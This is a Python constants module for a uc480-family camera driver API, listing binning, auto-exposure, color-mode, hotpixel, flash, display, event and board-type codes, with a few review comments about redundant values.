IS_BINNING_2X_VERTICAL = 0x0001
IS_BINNING_2X_HORIZONTAL = 0x0002
IS_BINNING_4X_VERTICAL = 0x0004
IS_BINNING_4X_HORIZONTAL = 0x0008
IS_BINNING_3X_VERTICAL = 0x0010
IS_BINNING_3X_HORIZONTAL = 0x0020
IS_BINNING_5X_VERTICAL = 0x0040
IS_BINNING_5X_HORIZONTAL = 0x0080
IS_BINNING_6X_VERTICAL = 0x0100
IS_BINNING_6X_HORIZONTAL = 0x0200
IS_BINNING_8X_VERTICAL = 0x0400
IS_BINNING_8X_HORIZONTAL = 0x0800
IS_BINNING_16X_VERTICAL = 0x1000
IS_BINNING_16X_HORIZONTAL = 0x2000
IS_BINNING_COLOR = 0x01
IS_BINNING_MONO = 0x02
IS_BINNING_MASK_VERTICAL = (IS_BINNING_2X_VERTICAL | IS_BINNING_3X_VERTICAL | IS_BINNING_4X_VERTICAL | IS_BINNING_5X_VERTICAL | IS_BINNING_6X_VERTICAL | IS_BINNING_8X_VERTICAL | IS_BINNING_16X_VERTICAL)
IS_BINNING_MASK_HORIZONTAL = (IS_BINNING_2X_HORIZONTAL | IS_BINNING_3X_HORIZONTAL | IS_BINNING_4X_HORIZONTAL | IS_BINNING_5X_HORIZONTAL | IS_BINNING_6X_HORIZONTAL | IS_BINNING_8X_HORIZONTAL | IS_BINNING_16X_HORIZONTAL)
# Compatibility
IS_BINNING_VERT = IS_BINNING_2X_VERTICAL
IS_BINNING_HOR = IS_BINNING_2X_HORIZONTAL
# ----------------------------------------------------------------------------
# Auto Control Parameter
# ----------------------------------------------------------------------------
# Enable/query codes for the automatic gain/shutter/whitebalance/framerate
# features, followed by the tunable parameter codes (0x8000-range).
IS_SET_ENABLE_AUTO_GAIN = 0x8800
IS_GET_ENABLE_AUTO_GAIN = 0x8801
IS_SET_ENABLE_AUTO_SHUTTER = 0x8802
IS_GET_ENABLE_AUTO_SHUTTER = 0x8803
IS_SET_ENABLE_AUTO_WHITEBALANCE = 0x8804
IS_GET_ENABLE_AUTO_WHITEBALANCE = 0x8805
IS_SET_ENABLE_AUTO_FRAMERATE = 0x8806
IS_GET_ENABLE_AUTO_FRAMERATE = 0x8807
IS_SET_ENABLE_AUTO_SENSOR_GAIN = 0x8808
IS_GET_ENABLE_AUTO_SENSOR_GAIN = 0x8809
IS_SET_ENABLE_AUTO_SENSOR_SHUTTER = 0x8810
IS_GET_ENABLE_AUTO_SENSOR_SHUTTER = 0x8811
IS_SET_ENABLE_AUTO_SENSOR_GAIN_SHUTTER = 0x8812
IS_GET_ENABLE_AUTO_SENSOR_GAIN_SHUTTER = 0x8813
IS_SET_ENABLE_AUTO_SENSOR_FRAMERATE = 0x8814
IS_GET_ENABLE_AUTO_SENSOR_FRAMERATE = 0x8815
IS_SET_ENABLE_AUTO_SENSOR_WHITEBALANCE = 0x8816
IS_GET_ENABLE_AUTO_SENSOR_WHITEBALANCE = 0x8817
IS_SET_AUTO_REFERENCE = 0x8000
IS_GET_AUTO_REFERENCE = 0x8001
IS_SET_AUTO_GAIN_MAX = 0x8002
IS_GET_AUTO_GAIN_MAX = 0x8003
IS_SET_AUTO_SHUTTER_MAX = 0x8004
IS_GET_AUTO_SHUTTER_MAX = 0x8005
IS_SET_AUTO_SPEED = 0x8006
IS_GET_AUTO_SPEED = 0x8007
IS_SET_AUTO_WB_OFFSET = 0x8008
IS_GET_AUTO_WB_OFFSET = 0x8009
IS_SET_AUTO_WB_GAIN_RANGE = 0x800A
IS_GET_AUTO_WB_GAIN_RANGE = 0x800B
IS_SET_AUTO_WB_SPEED = 0x800C
IS_GET_AUTO_WB_SPEED = 0x800D
IS_SET_AUTO_WB_ONCE = 0x800E
IS_GET_AUTO_WB_ONCE = 0x800F
IS_SET_AUTO_BRIGHTNESS_ONCE = 0x8010
IS_GET_AUTO_BRIGHTNESS_ONCE = 0x8011
IS_SET_AUTO_HYSTERESIS = 0x8012
IS_GET_AUTO_HYSTERESIS = 0x8013
IS_GET_AUTO_HYSTERESIS_RANGE = 0x8014
IS_SET_AUTO_WB_HYSTERESIS = 0x8015
IS_GET_AUTO_WB_HYSTERESIS = 0x8016
IS_GET_AUTO_WB_HYSTERESIS_RANGE = 0x8017
IS_SET_AUTO_SKIPFRAMES = 0x8018
IS_GET_AUTO_SKIPFRAMES = 0x8019
IS_GET_AUTO_SKIPFRAMES_RANGE = 0x801A
IS_SET_AUTO_WB_SKIPFRAMES = 0x801B
IS_GET_AUTO_WB_SKIPFRAMES = 0x801C
IS_GET_AUTO_WB_SKIPFRAMES_RANGE = 0x801D
IS_SET_SENS_AUTO_SHUTTER_PHOTOM = 0x801E
IS_SET_SENS_AUTO_GAIN_PHOTOM = 0x801F
IS_GET_SENS_AUTO_SHUTTER_PHOTOM = 0x8020
IS_GET_SENS_AUTO_GAIN_PHOTOM = 0x8021
IS_GET_SENS_AUTO_SHUTTER_PHOTOM_DEF = 0x8022
IS_GET_SENS_AUTO_GAIN_PHOTOM_DEF = 0x8023
IS_SET_SENS_AUTO_CONTRAST_CORRECTION = 0x8024
IS_GET_SENS_AUTO_CONTRAST_CORRECTION = 0x8025
IS_GET_SENS_AUTO_CONTRAST_CORRECTION_RANGE = 0x8026
IS_GET_SENS_AUTO_CONTRAST_CORRECTION_INC = 0x8027
IS_GET_SENS_AUTO_CONTRAST_CORRECTION_DEF = 0x8028
IS_SET_SENS_AUTO_CONTRAST_FDT_AOI_ENABLE = 0x8029
IS_GET_SENS_AUTO_CONTRAST_FDT_AOI_ENABLE = 0x8030
IS_SET_SENS_AUTO_BACKLIGHT_COMP = 0x8031
IS_GET_SENS_AUTO_BACKLIGHT_COMP = 0x8032
IS_GET_SENS_AUTO_BACKLIGHT_COMP_RANGE = 0x8033
IS_GET_SENS_AUTO_BACKLIGHT_COMP_INC = 0x8034
IS_GET_SENS_AUTO_BACKLIGHT_COMP_DEF = 0x8035
IS_SET_ANTI_FLICKER_MODE = 0x8036
IS_GET_ANTI_FLICKER_MODE = 0x8037
IS_GET_ANTI_FLICKER_MODE_DEF = 0x8038
# ----------------------------------------------------------------------------
# Auto Control definitions
# ----------------------------------------------------------------------------
# Valid ranges / defaults for the auto-control parameters above.
IS_MIN_AUTO_BRIGHT_REFERENCE = 0
IS_MAX_AUTO_BRIGHT_REFERENCE = 255
IS_DEFAULT_AUTO_BRIGHT_REFERENCE = 128
IS_MIN_AUTO_SPEED = 0
IS_MAX_AUTO_SPEED = 100
IS_DEFAULT_AUTO_SPEED = 50
IS_DEFAULT_AUTO_WB_OFFSET = 0
IS_MIN_AUTO_WB_OFFSET = -50
IS_MAX_AUTO_WB_OFFSET = 50
IS_DEFAULT_AUTO_WB_SPEED = 50
IS_MIN_AUTO_WB_SPEED = 0
IS_MAX_AUTO_WB_SPEED = 100
IS_MIN_AUTO_WB_REFERENCE = 0
IS_MAX_AUTO_WB_REFERENCE = 255
# ----------------------------------------------------------------------------
# AOI types to set/get
# ----------------------------------------------------------------------------
IS_SET_AUTO_BRIGHT_AOI = 0x8000
IS_GET_AUTO_BRIGHT_AOI = 0x8001
IS_SET_IMAGE_AOI = 0x8002
IS_GET_IMAGE_AOI = 0x8003
IS_SET_AUTO_WB_AOI = 0x8004
IS_GET_AUTO_WB_AOI = 0x8005
# ----------------------------------------------------------------------------
# color modes
# ----------------------------------------------------------------------------
# Legacy IS_SET_CM_* pixel-format ids, plus the "compliant" IS_CM_* names
# built by OR-ing a base format with order (BGR/RGB) and layout
# (packed/planar) flag bits.
IS_GET_COLOR_MODE = 0x8000
IS_SET_CM_RGB32 = 0
IS_SET_CM_RGB24 = 1
IS_SET_CM_RGB16 = 2
IS_SET_CM_RGB15 = 3
IS_SET_CM_Y8 = 6
IS_SET_CM_RGB8 = 7
IS_SET_CM_BAYER = 11
IS_SET_CM_UYVY = 12
IS_SET_CM_UYVY_MONO = 13
IS_SET_CM_UYVY_BAYER = 14
IS_SET_CM_CBYCRY = 23
IS_SET_CM_RGBY = 24
IS_SET_CM_RGB30 = 25
IS_SET_CM_Y12 = 26
IS_SET_CM_BAYER12 = 27
IS_SET_CM_Y16 = 28
IS_SET_CM_BAYER16 = 29
IS_CM_MODE_MASK = 0x007F
# planar vs packed format
IS_CM_FORMAT_PACKED = 0x0000
IS_CM_FORMAT_PLANAR = 0x2000
IS_CM_FORMAT_MASK = 0x2000
# BGR vs. RGB order
IS_CM_ORDER_BGR = 0x0000
IS_CM_ORDER_RGB = 0x0080
IS_CM_ORDER_MASK = 0x0080
# define compliant color format names
IS_CM_MONO8 = IS_SET_CM_Y8 # occupies 8 Bit
IS_CM_MONO12 = IS_SET_CM_Y12 # occupies 16 Bit
IS_CM_MONO16 = IS_SET_CM_Y16 # occupies 16 Bit
IS_CM_BAYER_RG8 = IS_SET_CM_BAYER # occupies 8 Bit
IS_CM_BAYER_RG12 = IS_SET_CM_BAYER12 # occupies 16 Bit
IS_CM_BAYER_RG16 = IS_SET_CM_BAYER16 # occupies 16 Bit
IS_CM_SENSOR_RAW8 = IS_SET_CM_BAYER # occupies 8 Bit
IS_CM_SENSOR_RAW12 = IS_SET_CM_BAYER12 # occupies 16 Bit
IS_CM_SENSOR_RAW16 = IS_SET_CM_BAYER16 # occupies 16 Bit
IS_CM_BGR5_PACKED = (IS_SET_CM_RGB15 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 16 Bit
IS_CM_BGR555_PACKED = (IS_SET_CM_RGB15 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 16 Bit
IS_CM_BGR565_PACKED = (IS_SET_CM_RGB16 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 16 Bit
IS_CM_RGB8_PACKED = (IS_SET_CM_RGB24 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED) # occupies 24 Bit
IS_CM_BGR8_PACKED = (IS_SET_CM_RGB24 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 24 Bit
IS_CM_RGBA8_PACKED = (IS_SET_CM_RGB32 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED) # occupies 32 Bit
IS_CM_BGRA8_PACKED = (IS_SET_CM_RGB32 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 32 Bit
IS_CM_RGBY8_PACKED = (IS_SET_CM_RGBY | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED) # occupies 32 Bit
IS_CM_BGRY8_PACKED = (IS_SET_CM_RGBY | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 32 Bit
IS_CM_RGB10V2_PACKED = (IS_SET_CM_RGB30 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED) # occupies 32 Bit
IS_CM_BGR10V2_PACKED = (IS_SET_CM_RGB30 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 32 Bit
# NOTE(review): the literals 25/30/31 below are raw base-format ids with no
# IS_SET_CM_* name in this file (25 == IS_SET_CM_RGB30) — confirm against
# the vendor header.
IS_CM_RGB10_PACKED = (25 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED)
IS_CM_BGR10_PACKED = (25 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED)
IS_CM_RGB12_PACKED = (30 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED) # occupies 48 Bit
IS_CM_BGR12_PACKED = (30 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 48 Bit
IS_CM_RGBA12_PACKED = (31 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PACKED) # occupies 64 Bit
IS_CM_BGRA12_PACKED = (31 | IS_CM_ORDER_BGR | IS_CM_FORMAT_PACKED) # occupies 64 Bit
IS_CM_YUV422_PACKED = 1 # no compliant version
IS_CM_UYVY_PACKED = (IS_SET_CM_UYVY | IS_CM_FORMAT_PACKED) # occupies 16 Bit
IS_CM_UYVY_MONO_PACKED = (IS_SET_CM_UYVY_MONO | IS_CM_FORMAT_PACKED)
IS_CM_UYVY_BAYER_PACKED= (IS_SET_CM_UYVY_BAYER | IS_CM_FORMAT_PACKED)
IS_CM_CBYCRY_PACKED = (IS_SET_CM_CBYCRY | IS_CM_FORMAT_PACKED) # occupies 16 Bit
IS_CM_RGB8_PLANAR = (1 | IS_CM_ORDER_RGB | IS_CM_FORMAT_PLANAR)
IS_CM_RGB12_PLANAR = 1 # no compliant version
IS_CM_RGB16_PLANAR = 1 # no compliant version
IS_CM_ALL_POSSIBLE = 0xFFFF
# NOTE(review): IS_CM_MODE_MASK is re-assigned here with the same value
# (0x007F) as its earlier definition above — redundant but harmless.
IS_CM_MODE_MASK = 0x007F
# ----------------------------------------------------------------------------
# Hotpixel correction
# ----------------------------------------------------------------------------
# Deprecated defines
# Old bad-pixel-correction (BPC) API codes, kept for compatibility.
IS_GET_BPC_MODE = 0x8000
IS_GET_BPC_THRESHOLD = 0x8001
IS_GET_BPC_SUPPORTED_MODE = 0x8002
IS_BPC_DISABLE = 0
IS_BPC_ENABLE_LEVEL_1 = 1
IS_BPC_ENABLE_LEVEL_2 = 2
IS_BPC_ENABLE_USER = 4
IS_BPC_ENABLE_SOFTWARE = IS_BPC_ENABLE_LEVEL_2
IS_BPC_ENABLE_HARDWARE = IS_BPC_ENABLE_LEVEL_1
IS_SET_BADPIXEL_LIST = 0x01
IS_GET_BADPIXEL_LIST = 0x02
IS_GET_LIST_SIZE = 0x03
# Valid defines
# Current hotpixel-correction sub-commands.
IS_HOTPIXEL_DISABLE_CORRECTION = 0x0000
IS_HOTPIXEL_ENABLE_SENSOR_CORRECTION = 0x0001
IS_HOTPIXEL_ENABLE_CAMERA_CORRECTION = 0x0002
IS_HOTPIXEL_ENABLE_SOFTWARE_USER_CORRECTION = 0x0004
IS_HOTPIXEL_GET_CORRECTION_MODE = 0x8000
IS_HOTPIXEL_GET_SUPPORTED_CORRECTION_MODES = 0x8001
IS_HOTPIXEL_GET_SOFTWARE_USER_LIST_EXISTS = 0x8100
IS_HOTPIXEL_GET_SOFTWARE_USER_LIST_NUMBER = 0x8101
IS_HOTPIXEL_GET_SOFTWARE_USER_LIST = 0x8102
IS_HOTPIXEL_SET_SOFTWARE_USER_LIST = 0x8103
IS_HOTPIXEL_SAVE_SOFTWARE_USER_LIST = 0x8104
IS_HOTPIXEL_LOAD_SOFTWARE_USER_LIST = 0x8105
IS_HOTPIXEL_GET_CAMERA_FACTORY_LIST_EXISTS = 0x8106
IS_HOTPIXEL_GET_CAMERA_FACTORY_LIST_NUMBER = 0x8107
IS_HOTPIXEL_GET_CAMERA_FACTORY_LIST = 0x8108
IS_HOTPIXEL_GET_CAMERA_USER_LIST_EXISTS = 0x8109
IS_HOTPIXEL_GET_CAMERA_USER_LIST_NUMBER = 0x810A
IS_HOTPIXEL_GET_CAMERA_USER_LIST = 0x810B
IS_HOTPIXEL_SET_CAMERA_USER_LIST = 0x810C
IS_HOTPIXEL_GET_CAMERA_USER_LIST_MAX_NUMBER = 0x810D
IS_HOTPIXEL_DELETE_CAMERA_USER_LIST = 0x810E
IS_HOTPIXEL_GET_MERGED_CAMERA_LIST_NUMBER = 0x810F
IS_HOTPIXEL_GET_MERGED_CAMERA_LIST = 0x8110
IS_HOTPIXEL_SAVE_SOFTWARE_USER_LIST_UNICODE = 0x8111
IS_HOTPIXEL_LOAD_SOFTWARE_USER_LIST_UNICODE = 0x8112
# ----------------------------------------------------------------------------
# color correction definitions
# ----------------------------------------------------------------------------
IS_GET_CCOR_MODE = 0x8000
IS_GET_SUPPORTED_CCOR_MODE = 0x8001
IS_GET_DEFAULT_CCOR_MODE = 0x8002
IS_GET_CCOR_FACTOR = 0x8003
IS_GET_CCOR_FACTOR_MIN = 0x8004
IS_GET_CCOR_FACTOR_MAX = 0x8005
IS_GET_CCOR_FACTOR_DEFAULT = 0x8006
IS_CCOR_DISABLE = 0x0000
IS_CCOR_ENABLE = 0x0001
IS_CCOR_ENABLE_NORMAL = IS_CCOR_ENABLE
IS_CCOR_ENABLE_BG40_ENHANCED = 0x0002
IS_CCOR_ENABLE_HQ_ENHANCED = 0x0004
IS_CCOR_SET_IR_AUTOMATIC = 0x0080
IS_CCOR_FACTOR = 0x0100
IS_CCOR_ENABLE_MASK = (IS_CCOR_ENABLE_NORMAL | IS_CCOR_ENABLE_BG40_ENHANCED | IS_CCOR_ENABLE_HQ_ENHANCED)
# ----------------------------------------------------------------------------
# bayer algorithm modes
# ----------------------------------------------------------------------------
IS_GET_BAYER_CV_MODE = 0x8000
IS_SET_BAYER_CV_NORMAL = 0x0000
IS_SET_BAYER_CV_BETTER = 0x0001
IS_SET_BAYER_CV_BEST = 0x0002
# ----------------------------------------------------------------------------
# color converter modes
# ----------------------------------------------------------------------------
IS_CONV_MODE_NONE = 0x0000
IS_CONV_MODE_SOFTWARE = 0x0001
IS_CONV_MODE_SOFTWARE_3X3 = 0x0002
IS_CONV_MODE_SOFTWARE_5X5 = 0x0004
IS_CONV_MODE_HARDWARE_3X3 = 0x0008
IS_CONV_MODE_OPENCL_3X3 = 0x0020
IS_CONV_MODE_OPENCL_5X5 = 0x0040
# ----------------------------------------------------------------------------
# Edge enhancement
# ----------------------------------------------------------------------------
IS_GET_EDGE_ENHANCEMENT = 0x8000
IS_EDGE_EN_DISABLE = 0
IS_EDGE_EN_STRONG = 1
IS_EDGE_EN_WEAK = 2
# ----------------------------------------------------------------------------
# white balance modes
# ----------------------------------------------------------------------------
IS_GET_WB_MODE = 0x8000
IS_SET_WB_DISABLE = 0x0000
IS_SET_WB_USER = 0x0001
IS_SET_WB_AUTO_ENABLE = 0x0002
IS_SET_WB_AUTO_ENABLE_ONCE = 0x0004
IS_SET_WB_DAYLIGHT_65 = 0x0101
IS_SET_WB_COOL_WHITE = 0x0102
IS_SET_WB_U30 = 0x0103
IS_SET_WB_ILLUMINANT_A = 0x0104
IS_SET_WB_HORIZON = 0x0105
# ----------------------------------------------------------------------------
# flash strobe constants
# ----------------------------------------------------------------------------
IS_GET_FLASHSTROBE_MODE = 0x8000
IS_GET_FLASHSTROBE_LINE = 0x8001
IS_GET_SUPPORTED_FLASH_IO_PORTS = 0x8002
IS_SET_FLASH_OFF = 0
IS_SET_FLASH_ON = 1
IS_SET_FLASH_LO_ACTIVE = IS_SET_FLASH_ON
IS_SET_FLASH_HI_ACTIVE = 2
IS_SET_FLASH_HIGH = 3
IS_SET_FLASH_LOW = 4
IS_SET_FLASH_LO_ACTIVE_FREERUN = 5
IS_SET_FLASH_HI_ACTIVE_FREERUN = 6
IS_SET_FLASH_IO_1 = 0x0010
IS_SET_FLASH_IO_2 = 0x0020
IS_SET_FLASH_IO_3 = 0x0040
IS_SET_FLASH_IO_4 = 0x0080
IS_FLASH_IO_PORT_MASK = (IS_SET_FLASH_IO_1 | IS_SET_FLASH_IO_2 | IS_SET_FLASH_IO_3 | IS_SET_FLASH_IO_4)
# Negative values select flash delay/duration queries (distinct from the
# positive mode codes above).
IS_GET_FLASH_DELAY = -1
IS_GET_FLASH_DURATION = -2
IS_GET_MAX_FLASH_DELAY = -3
IS_GET_MAX_FLASH_DURATION = -4
IS_GET_MIN_FLASH_DELAY = -5
IS_GET_MIN_FLASH_DURATION = -6
IS_GET_FLASH_DELAY_GRANULARITY = -7
IS_GET_FLASH_DURATION_GRANULARITY = -8
# ----------------------------------------------------------------------------
# Digital IO constants
# ----------------------------------------------------------------------------
IS_GET_IO = 0x8000
IS_GET_IO_MASK = 0x8000
IS_GET_INPUT_MASK = 0x8001
IS_GET_OUTPUT_MASK = 0x8002
IS_GET_SUPPORTED_IO_PORTS = 0x8004
# ----------------------------------------------------------------------------
# EEPROM defines
# ----------------------------------------------------------------------------
IS_EEPROM_MIN_USER_ADDRESS = 0
IS_EEPROM_MAX_USER_ADDRESS = 63
IS_EEPROM_MAX_USER_SPACE = 64
# ----------------------------------------------------------------------------
# error report modes
# ----------------------------------------------------------------------------
IS_GET_ERR_REP_MODE = 0x8000
IS_ENABLE_ERR_REP = 1
IS_DISABLE_ERR_REP = 0
# ----------------------------------------------------------------------------
# display mode selectors
# ----------------------------------------------------------------------------
IS_GET_DISPLAY_MODE = 0x8000
IS_GET_DISPLAY_SIZE_X = 0x8000
IS_GET_DISPLAY_SIZE_Y = 0x8001
IS_GET_DISPLAY_POS_X = 0x8000
IS_GET_DISPLAY_POS_Y = 0x8001
# Display back-end selection flags (bit flags, may be combined).
IS_SET_DM_DIB = 1
IS_SET_DM_DIRECTDRAW = 2
IS_SET_DM_DIRECT3D = 4
IS_SET_DM_OPENGL = 8
IS_SET_DM_ALLOW_SYSMEM = 0x40
IS_SET_DM_ALLOW_PRIMARY = 0x80
# -- overlay display mode ---
IS_GET_DD_OVERLAY_SCALE = 0x8000
IS_SET_DM_ALLOW_OVERLAY = 0x100
IS_SET_DM_ALLOW_SCALING = 0x200
IS_SET_DM_ALLOW_FIELDSKIP = 0x400
IS_SET_DM_MONO = 0x800
IS_SET_DM_BAYER = 0x1000
IS_SET_DM_YCBCR = 0x4000
# -- backbuffer display mode ---
IS_SET_DM_BACKBUFFER = 0x2000
# ----------------------------------------------------------------------------
# DirectRenderer commands
# ----------------------------------------------------------------------------
# Sequential command ids for the DirectRenderer overlay API.
DR_GET_OVERLAY_DC = 1
DR_GET_MAX_OVERLAY_SIZE = 2
DR_GET_OVERLAY_KEY_COLOR = 3
DR_RELEASE_OVERLAY_DC = 4
DR_SHOW_OVERLAY = 5
DR_HIDE_OVERLAY = 6
DR_SET_OVERLAY_SIZE = 7
DR_SET_OVERLAY_POSITION = 8
DR_SET_OVERLAY_KEY_COLOR = 9
DR_SET_HWND = 10
DR_ENABLE_SCALING = 11
DR_DISABLE_SCALING = 12
DR_CLEAR_OVERLAY = 13
DR_ENABLE_SEMI_TRANSPARENT_OVERLAY = 14
DR_DISABLE_SEMI_TRANSPARENT_OVERLAY= 15
DR_CHECK_COMPATIBILITY = 16
DR_SET_VSYNC_OFF = 17
DR_SET_VSYNC_AUTO = 18
DR_SET_USER_SYNC = 19
DR_GET_USER_SYNC_POSITION_RANGE = 20
DR_LOAD_OVERLAY_FROM_FILE = 21
DR_STEAL_NEXT_FRAME = 22
DR_SET_STEAL_FORMAT = 23
DR_GET_STEAL_FORMAT = 24
DR_ENABLE_IMAGE_SCALING = 25
DR_GET_OVERLAY_SIZE = 26
DR_CHECK_COLOR_MODE_SUPPORT = 27
DR_GET_OVERLAY_DATA = 28
DR_UPDATE_OVERLAY_DATA = 29
DR_GET_SUPPORTED = 30
# ----------------------------------------------------------------------------
# DirectDraw keying color constants
# ----------------------------------------------------------------------------
IS_GET_KC_RED = 0x8000
IS_GET_KC_GREEN = 0x8001
IS_GET_KC_BLUE = 0x8002
IS_GET_KC_RGB = 0x8003
IS_GET_KC_INDEX = 0x8004
IS_GET_KEYOFFSET_X = 0x8000
IS_GET_KEYOFFSET_Y = 0x8001
# RGB-triple for default key-color in 15,16,24,32 bit mode
IS_SET_KC_DEFAULT = 0xFF00FF # 0xbbggrr
# color index for default key-color in 8bit palette mode
IS_SET_KC_DEFAULT_8 = 253
# ----------------------------------------------------------------------------
# Memoryboard
# ----------------------------------------------------------------------------
IS_MEMORY_GET_COUNT = 0x8000
IS_MEMORY_GET_DELAY = 0x8001
IS_MEMORY_MODE_DISABLE = 0x0000
IS_MEMORY_USE_TRIGGER = 0xFFFF
# ----------------------------------------------------------------------------
# Test image modes
# ----------------------------------------------------------------------------
IS_GET_TEST_IMAGE = 0x8000
IS_SET_TEST_IMAGE_DISABLED = 0x0000
IS_SET_TEST_IMAGE_MEMORY_1 = 0x0001
IS_SET_TEST_IMAGE_MEMORY_2 = 0x0002
IS_SET_TEST_IMAGE_MEMORY_3 = 0x0003
# ----------------------------------------------------------------------------
# Led settings
# ----------------------------------------------------------------------------
IS_SET_LED_OFF = 0
IS_SET_LED_ON = 1
IS_SET_LED_TOGGLE = 2
IS_GET_LED = 0x8000
# ----------------------------------------------------------------------------
# save options
# ----------------------------------------------------------------------------
IS_SAVE_USE_ACTUAL_IMAGE_SIZE = 0x00010000
# ----------------------------------------------------------------------------
# renumeration modes
# ----------------------------------------------------------------------------
IS_RENUM_BY_CAMERA = 0
IS_RENUM_BY_HOST = 1
# ----------------------------------------------------------------------------
# event constants
# ----------------------------------------------------------------------------
IS_SET_EVENT_ODD = 0
IS_SET_EVENT_EVEN = 1
IS_SET_EVENT_FRAME = 2
IS_SET_EVENT_EXTTRIG = 3
IS_SET_EVENT_VSYNC = 4
IS_SET_EVENT_SEQ = 5
IS_SET_EVENT_STEAL = 6
IS_SET_EVENT_VPRES = 7
# NOTE: TRANSFER_FAILED and CAPTURE_STATUS are numeric aliases (both 8).
IS_SET_EVENT_TRANSFER_FAILED = 8
IS_SET_EVENT_CAPTURE_STATUS = 8
IS_SET_EVENT_DEVICE_RECONNECTED= 9
IS_SET_EVENT_MEMORY_MODE_FINISH= 10
IS_SET_EVENT_FRAME_RECEIVED = 11
IS_SET_EVENT_WB_FINISHED = 12
IS_SET_EVENT_AUTOBRIGHTNESS_FINISHED= 13
IS_SET_EVENT_OVERLAY_DATA_LOST = 16
IS_SET_EVENT_CAMERA_MEMORY = 17
IS_SET_EVENT_CONNECTIONSPEED_CHANGED = 18
IS_SET_EVENT_REMOVE = 128
IS_SET_EVENT_REMOVAL = 129
IS_SET_EVENT_NEW_DEVICE = 130
IS_SET_EVENT_STATUS_CHANGED = 131
# ----------------------------------------------------------------------------
# Window message defines
# ----------------------------------------------------------------------------
# Win32 WM_USER base; IS_UC480_MESSAGE is the driver's private window message,
# with the codes below passed in its parameters.
WM_USER = 0x400
IS_UC480_MESSAGE = (WM_USER + 0x0100)
IS_FRAME = 0x0000
IS_SEQUENCE = 0x0001
IS_TRIGGER = 0x0002
# NOTE: TRANSFER_FAILED and CAPTURE_STATUS are numeric aliases (both 0x0003).
IS_TRANSFER_FAILED = 0x0003
IS_CAPTURE_STATUS = 0x0003
IS_DEVICE_RECONNECTED = 0x0004
IS_MEMORY_MODE_FINISH = 0x0005
IS_FRAME_RECEIVED = 0x0006
IS_GENERIC_ERROR = 0x0007
IS_STEAL_VIDEO = 0x0008
IS_WB_FINISHED = 0x0009
IS_AUTOBRIGHTNESS_FINISHED = 0x000A
IS_OVERLAY_DATA_LOST = 0x000B
IS_CAMERA_MEMORY = 0x000C
IS_CONNECTIONSPEED_CHANGED = 0x000D
IS_DEVICE_REMOVED = 0x1000
IS_DEVICE_REMOVAL = 0x1001
IS_NEW_DEVICE = 0x1002
IS_DEVICE_STATUS_CHANGED = 0x1003
# ----------------------------------------------------------------------------
# camera id constants
# ----------------------------------------------------------------------------
IS_GET_CAMERA_ID = 0x8000
# ----------------------------------------------------------------------------
# camera info constants
# ----------------------------------------------------------------------------
# Status/info item selectors for the camera-info query API.
IS_GET_STATUS = 0x8000
IS_EXT_TRIGGER_EVENT_CNT = 0
IS_FIFO_OVR_CNT = 1
IS_SEQUENCE_CNT = 2
IS_LAST_FRAME_FIFO_OVR = 3
IS_SEQUENCE_SIZE = 4
IS_VIDEO_PRESENT = 5
IS_STEAL_FINISHED = 6
IS_STORE_FILE_PATH = 7
IS_LUMA_BANDWIDTH_FILTER = 8
IS_BOARD_REVISION = 9
IS_MIRROR_BITMAP_UPDOWN = 10
IS_BUS_OVR_CNT = 11
IS_STEAL_ERROR_CNT = 12
IS_LOW_COLOR_REMOVAL = 13
IS_CHROMA_COMB_FILTER = 14
IS_CHROMA_AGC = 15
IS_WATCHDOG_ON_BOARD = 16
IS_PASSTHROUGH_ON_BOARD = 17
IS_EXTERNAL_VREF_MODE = 18
IS_WAIT_TIMEOUT = 19
IS_TRIGGER_MISSED = 20
IS_LAST_CAPTURE_ERROR = 21
IS_PARAMETER_SET_1 = 22
IS_PARAMETER_SET_2 = 23
IS_STANDBY = 24
IS_STANDBY_SUPPORTED = 25
IS_QUEUED_IMAGE_EVENT_CNT = 26
IS_PARAMETER_EXT = 27
# ----------------------------------------------------------------------------
# interface type defines
# ----------------------------------------------------------------------------
# Interface family bases; board types below are built by adding small
# offsets to these.
IS_INTERFACE_TYPE_USB = 0x40
IS_INTERFACE_TYPE_USB3 = 0x60
IS_INTERFACE_TYPE_ETH = 0x80
# ----------------------------------------------------------------------------
# board type defines
# ----------------------------------------------------------------------------
IS_BOARD_TYPE_FALCON = 1
IS_BOARD_TYPE_EAGLE = 2
IS_BOARD_TYPE_FALCON2 = 3
IS_BOARD_TYPE_FALCON_PLUS = 7
IS_BOARD_TYPE_FALCON_QUATTRO = 9
IS_BOARD_TYPE_FALCON_DUO = 10
IS_BOARD_TYPE_EAGLE_QUATTRO = 11
IS_BOARD_TYPE_EAGLE_DUO = 12
IS_BOARD_TYPE_UC480_USB = (IS_INTERFACE_TYPE_USB + 0) # 0x40
IS_BOARD_TYPE_UC480_USB_SE = IS_BOARD_TYPE_UC480_USB # 0x40
IS_BOARD_TYPE_UC480_USB_RE = IS_BOARD_TYPE_UC480_USB # 0x40
IS_BOARD_TYPE_UC480_USB_ME = (IS_INTERFACE_TYPE_USB + 0x01) # 0x41
IS_BOARD_TYPE_UC480_USB_LE = (IS_INTERFACE_TYPE_USB + 0x02) # 0x42
IS_BOARD_TYPE_UC480_USB_XS = (IS_INTERFACE_TYPE_USB + 0x03) # 0x43
IS_BOARD_TYPE_UC480_USB_ML = (IS_INTERFACE_TYPE_USB + 0x05) # 0x45
IS_BOARD_TYPE_UC480_USB3_CP = (IS_INTERFACE_TYPE_USB3 + 0x04) # 0x64
IS_BOARD_TYPE_UC480_ETH = IS_INTERFACE_TYPE_ETH # 0x80
IS_BOARD_TYPE_UC480_ETH_HE = IS_BOARD_TYPE_UC480_ETH # 0x80
